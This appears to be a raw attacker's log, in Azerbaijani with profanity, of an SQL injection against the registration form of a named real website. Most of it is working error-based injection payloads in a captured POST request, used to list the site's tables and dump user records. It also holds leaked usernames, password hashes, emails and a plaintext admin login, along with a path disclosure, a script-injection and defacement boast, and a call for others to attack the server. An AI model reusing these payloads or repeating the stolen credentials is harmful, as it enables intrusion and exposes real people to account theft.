
dr4g74df4gfd4g5dfg5

  1. Cox narahat sekilde mod_security ile qorunub.
  2. $_GET metodundaki injectionda mumkun deyil getmek injectionu.
  3. Amma $_POST metodla asagidaki kimi Tepeledik)
  4.  
  5.  
  6.  
  7.  
  8. |SELECT user_name, password FROM `members` WHERE user_name='sikdirde' order by 10-- AND 9='9' OR password='sikdirde' order by 10-- AND 9='9'|Unknown column '10' in 'order clause'
  9.  
  10.  
  11. =========================================================
  12.  
  13.  
  14. http://arm3a.org/index.php?go=registration&lang=en&act=insert
  15. METHOD POST:
  16. =========================================================
  17. HEADERS:
  18.  
  19. Host: arm3a.org
  20. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Firefox/17.0
  21. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  22. Accept-Language: en-US,en;q=0.5
  23. Accept-Encoding: gzip, deflate
  24. DNT: 1
  25. Connection: keep-alive
  26. Cookie: PHPSESSID=nrmdlu0n9scltvegj96idg1fj2; __utma=78176324.467657248.1354401113.1354401113.1354401113.1; __utmb=78176324.17.10.1354401113; __utmc=78176324; __utmz=78176324.1354401113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CircleCookieTest=1
  27. Content-Type: multipart/form-data; boundary=---------------------------265001916915724
  28. Content-Length: 3019
  29.  
  30. =========================================================
  31.  
  32.  
  33. REQUEST BODY:
  34.  
  35. -----------------------------265001916915724\r\n
  36. Content-Disposition: form-data; name="first_name_en"\r\n
  37. \r\n
  38. '\r\n
  39. -----------------------------265001916915724\r\n
  40. Content-Disposition: form-data; name="last_name_en"\r\n
  41. \r\n
  42. '\r\n
  43. -----------------------------265001916915724\r\n
  44. Content-Disposition: form-data; name="patronymic_en"\r\n
  45. \r\n
  46. '\r\n
  47. -----------------------------265001916915724\r\n
  48. Content-Disposition: form-data; name="gender"\r\n
  49. \r\n
  50. 1\r\n
  51. -----------------------------265001916915724\r\n
  52. Content-Disposition: form-data; name="residence_country_id"\r\n
  53. \r\n
  54. 7\r\n
  55. -----------------------------265001916915724\r\n
  56. Content-Disposition: form-data; name="title_en"\r\n
  57. \r\n
  58. '\r\n
  59. -----------------------------265001916915724\r\n
  60. Content-Disposition: form-data; name="email"\r\n
  61. \r\n
  62. aaa@aaa.com\r\n
  63. -----------------------------265001916915724\r\n
  64. Content-Disposition: form-data; name="mobile"\r\n
  65. \r\n
  66. '\r\n
  67. -----------------------------265001916915724\r\n
  68. Content-Disposition: form-data; name="is_subscribed"\r\n
  69. \r\n
  70. 1\r\n
  71. -----------------------------265001916915724\r\n
  72. Content-Disposition: form-data; name="user_name"\r\n
  73. \r\n
  74. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.TABLES where table_schema=database() LIMIT 1 offset 80),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  75. -----------------------------265001916915724\r\n
  76. Content-Disposition: form-data; name="password"\r\n
  77. \r\n
  78. sikdirde' order by 10-- AND 9='9\r\n
  79. -----------------------------265001916915724\r\n
  80. Content-Disposition: form-data; name="password_copy"\r\n
  81. \r\n
  82. sikdirde' order by 10-- AND 9='9\r\n
  83. -----------------------------265001916915724\r\n
  84. Content-Disposition: form-data; name="charter_accepted"\r\n
  85. \r\n
  86. 1\r\n
  87. -----------------------------265001916915724\r\n
  88. Content-Disposition: form-data; name="content_en"\r\n
  89. \r\n
  90. \r\n
  91. -----------------------------265001916915724\r\n
  92. Content-Disposition: form-data; name="tmp_date_birthdate"\r\n
  93. \r\n
  94. 02-12-2012\r\n
  95. -----------------------------265001916915724\r\n
  96. Content-Disposition: form-data; name="birthdate"\r\n
  97. \r\n
  98. 2012-12-02\r\n
  99. -----------------------------265001916915724\r\n
  100. Content-Disposition: form-data; name="personal_phone"\r\n
  101. \r\n
  102. \r\n
  103. -----------------------------265001916915724\r\n
  104. Content-Disposition: form-data; name="personal_address_en"\r\n
  105. \r\n
  106. \r\n
  107. -----------------------------265001916915724\r\n
  108. Content-Disposition: form-data; name="expertise_areas_en"\r\n
  109. \r\n
  110. \r\n
  111. -----------------------------265001916915724\r\n
  112. Content-Disposition: form-data; name="experience_en"\r\n
  113. \r\n
  114. \r\n
  115. -----------------------------265001916915724\r\n
  116. Content-Disposition: form-data; name="speciality_en"\r\n
  117. \r\n
  118. \r\n
  119. -----------------------------265001916915724\r\n
  120. Content-Disposition: form-data; name="scientific_degree_en"\r\n
  121. \r\n
  122. \r\n
  123. -----------------------------265001916915724\r\n
  124. Content-Disposition: form-data; name="university_en"\r\n
  125. \r\n
  126. \r\n
  127. -----------------------------265001916915724\r\n
  128. Content-Disposition: form-data; name="school_en"\r\n
  129. \r\n
  130. \r\n
  131. -----------------------------265001916915724\r\n
  132. Content-Disposition: form-data; name="hobby_en"\r\n
  133. \r\n
  134. \r\n
  135. -----------------------------265001916915724\r\n
  136. Content-Disposition: form-data; name="3_any_small"; filename=""\r\n
  137. Content-Type: application/octet-stream\r\n
  138. \r\n
  139. \r\n
  140. -----------------------------265001916915724\r\n
  141. Content-Disposition: form-data; name="save"\r\n
  142. \r\n
  143. Save\r\n
  144. -----------------------------265001916915724--\r\n
  145.  
  146. ==============================================================
  147.  
  148.  
  149. payload:
  150.  
  151. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.columns where table_schema=database() and column_name='password' LIMIT 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  152.  
  153.  
  154. helelik lazimli tablelar bele ki password columnu var bu table-larda.
  155.  
  156. offset 0 ====== 123_users
  157. offset 1 ========= members
  158.  
  159. offset 2 =========== members_backup
  160.  
  161. offset 3 ================= organizations
  162.  
  163.  
  164.  
  165.  
  166. =============
  167. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(count(*),0x7c) FROM 123_users),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  168.  
  169.  
  170. 6
  171.  
  172.  
  173. =============
  174. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='123_users' limit 1 offset 6),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  175.  
  176.  
  177.  
  178.  
  179. id
  180. full_name
  181. user_name
  182. password
  183. email
  184. is_banned
  185. rank
  186.  
  187. concat(id,0x7c,full_name,0x7c,user_name,0x7c,password,0x7c,email,0x7c,is_banned,0x7c,rank,0x7c) from 123_users
  188.  
  189.  
  190.  
  191. =============
  192.  
  193.  
  194. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,password,0x7c) FROM 123_users limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  195.  
  196. lilitkhalatyan|b7712161f4025c30f88ac2fd3e43f947
  197.  
  198. suro@itnet.am
  199.  
  200.  
  201.  
  202.  
  203.  
  204.  
  205. kopaloni|2045f9c08a7676957e61e683658b2acd
  206.  
  207.  
  208.  
  209. superadmin|4820ae2c8b5bca80656829e47e1ee0a4
  210.  
  211. AnnaSayadyan|4a3f0aa47a96eb616286c626b4a9d36d
  212.  
  213.  
  214.  
  215. animkrtchyan|b53599f87d9d0417b569c4a51288f764
  216.  
  217.  
  218. annag_at_mail_dot_ru|ed9fa1fb3337ef5a871e0302d6f1f5c6
  219.  
  220.  
  221.  
  222. ========================================
  223. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,id,0x7c) FROM members limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  224. gagikkarap
  225.  
  226. gagikkarap 44444444
  227.  
  228. gagikk@cit.am
  229. ========================================
  230. Login: superadmin
  231.  
  232. pass: arm3a
  233.  
  234. Admikani tapa bilmirem Fuck off)
  235.  
  236.  
  237.  
  238.  
  239. http://arm3a.org/members.php
  240.  
  241. path Disclosure:
  242.  
  243. /usr/local/www/apache22/www.arm3a.org/data/members.php
  244.  
  245.  
  246. ==========================================
  247.  
  248. table: members
  249.  
  250.  
  251. given_email
  252. email
  253. ITIN
  254. password
  255. user_name
  256. rank
  257. is_logged_in
  258.  
  259.  
  260. 485 member var.
  261.  
  262.  
  263.  
  264.  
  265.  
  266. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='members' limit 1 offset 84),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  267.  
  268. son yuxaridaki offsetdir bu table-da.
  269.  
  270. Plaintext pass userlerde)
  271. profile girib html/script inject oldu Fucked)
  272.  
  273. http://arm3a.org/?lang=am&go=members
  274. http://arm3a.org/?lang=en&go=home http://zone-h.org/mirror/id/18683315
  275.  
  276.  
  277.  
  278. Adminkani tapan olsa halal xosu mixlasin o servere.